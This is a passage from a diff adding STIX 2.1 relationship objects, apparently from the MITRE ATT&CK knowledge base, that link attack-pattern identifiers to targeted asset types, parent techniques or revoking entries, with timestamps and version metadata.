"identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7007935a-a8a7-4c0b-bd98-4e85be8ed197", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ca13a117-aae0-4802-878b-c09f4a04dd31", + "created": "2023-09-28T20:06:50.018Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:06:50.018Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ca18b2b1-a742-4017-86b7-59a590e29c17", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--232a7e42-cd6e-4902-8fe9-2960f529dd4d", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ca1aa71e-1347-4bdc-8f2e-24ea1990267b", + "created": "2024-06-21T14:12:20.274Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.274Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b83e166d-13d7-4b52-8677-dff90c548fd7", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ca225ea0-e813-4205-98db-707b474ae24f", + "created": "2024-04-09T20:49:44.575Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-04-09T20:49:44.575Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ca2bac8b-871b-41bf-a40c-31a9ef692904", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ca38e574-09b1-4fc3-beb1-2af04189c05d", + "created": "2020-10-02T14:56:25.034Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--69f897fd-12a9-4c89-ad6a-46d2f3c38262", + "target_ref": "attack-pattern--5282dd9a-d26d-4e16-88b7-7c0f4553daf4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ca3ca505-6e92-4e64-a666-8120f30755c8", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2db31dcd-54da-405d-acef-b9129b816ed6", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ca46a483-f346-4506-837b-e0a9ee0aceca", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ca6ed128-0b03-48b8-b2b0-0cb738a82ff8", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ca7368d6-ec56-4472-b59e-740f4edddba2", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--11f29a39-0942-4d62-92b6-fe236cf3066e", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ca770e9f-861d-4ae5-8336-0b6ae86f2bd1", + "created": "2024-06-26T14:24:30.913Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T14:24:30.913Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--caa4e512-f18f-44f6-942b-59bb48bc97b6", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5909f20f-3c39-4795-be06-ef1ea40d350b", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--caaf4118-680d-4ad3-a0e7-13c6b490e6f9", + "created": "2024-06-27T09:23:59.562Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:23:59.562Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cac3dd3d-1531-4192-9f2d-3ca6ef0e6ded", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--eb897572-8979-4242-a089-56f294f4c91d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cadb38f2-cfc0-4040-88dc-2dd5878a8d68", + "created": "2024-06-25T13:20:57.566Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-25T13:20:57.566Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e848506b-8484-4410-8017-3d235a52f5b3", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cae0e16c-07b6-48de-aaf6-89cad60e2b37", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cae36069-f6f2-4431-afa2-d5d18fe4c719", + "created": "2024-06-21T14:12:20.265Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.265Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cae74287-23c7-4e53-aea6-9058bdc77337", + "created": "2024-05-22T17:17:39.235Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T03:18:45.124Z", + "description": "Asset Mapping Rationale: Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses.", + "relationship_type": "targets", + "source_ref": "attack-pattern--d245808a-7086-4310-984a-a84aaaa43f8f", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cae7bf51-f07a-40ad-8d5e-ab0a08ebc12a", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c898c4b5-bf36-4e6e-a4ad-5b8c4c13e35b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--caf5a4d8-54e7-4e1a-a437-c13ba86a55a4", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--51a14c76-dd3b-440b-9c20-2bf91d25a814", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--caf6c785-55e5-486d-90f5-862d2be14b57", + "created": "2024-06-27T09:19:20.524Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:19:20.524Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6fa224c7-5091-4595-bf15-3fc9fe2f2c7c", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cb1446e0-b507-41b7-aa06-d8f4350f4f39", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cb197e40-0c4d-403f-b385-8ca378461de9", + "created": "2024-03-28T15:36:34.861Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-03-28T15:36:34.861Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--356662f7-e315-4759-86c9-6214e2a50ff8", + "target_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cb273dc3-b4cf-4f74-9bf7-c9f5c0afcde2", + "created": "2020-01-24T13:51:48.205Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--2892b9ee-ca9f-4723-b332-0dc6e843a8ae", + "target_ref": "attack-pattern--ce4b7013-640e-48a9-b501-d0025a95f4bf", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cb3b9d54-ba89-4af4-8724-3ffde36d101c", + "created": "2020-03-13T20:15:32.053Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d", + "target_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cb4015bf-e7a4-4b26-8816-1f7a996adf4f", + "created": "2020-03-20T15:22:53.973Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--00d0b012-8a03-410e-95de-5826bf542de6", + "target_ref": "attack-pattern--b0533c6e-8fea-4788-874f-b799cacc4b92", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cb44fc1a-67e0-4ea4-bed1-654da5c13c1f", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--438c967d-3996-4870-bfc2-3954752a1927", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cb47a3bb-daec-4aa1-9a92-af2a61bb65cd", + "created": "2023-09-28T21:14:29.099Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:14:29.099Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cb4a416f-de86-4e0c-8667-7024d26ec702", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cb5cc05b-9be9-4143-bbb9-8254602c7042", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ea016b56-ae0e-47fe-967a-cc0ad51af67f", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cb9beae5-6246-464a-978d-24b24f5cf72a", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cba2aacd-0e12-480b-9075-42629a39f1ae", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cbc2991d-65c4-4796-b7e9-7c3ab5631a63", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cbc65a60-3b40-4ecf-a10d-8ef1be72568d", + "created": "2024-04-09T20:54:26.301Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-04-09T20:54:26.301Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", + "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cbcee42d-ccf4-4ed4-b642-4aa5ae7a5423", + "created": "2024-06-21T14:12:20.273Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.273Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cbee31a0-716c-4b10-83f0-aa889bfb4749", + "created": "2023-10-20T17:05:25.595Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-10-20T17:05:25.595Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cc1f7b0c-a443-46ee-b9d6-b7ecb9ead9fa", + "created": "2023-06-02T15:27:58.785Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-06-02T15:27:58.785Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--45241b9e-9bbc-4826-a2cc-78855e51ca09", + "target_ref": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cc2ce888-e677-400e-9314-26e47d3e0932", + "created": "2024-06-27T09:34:02.226Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + 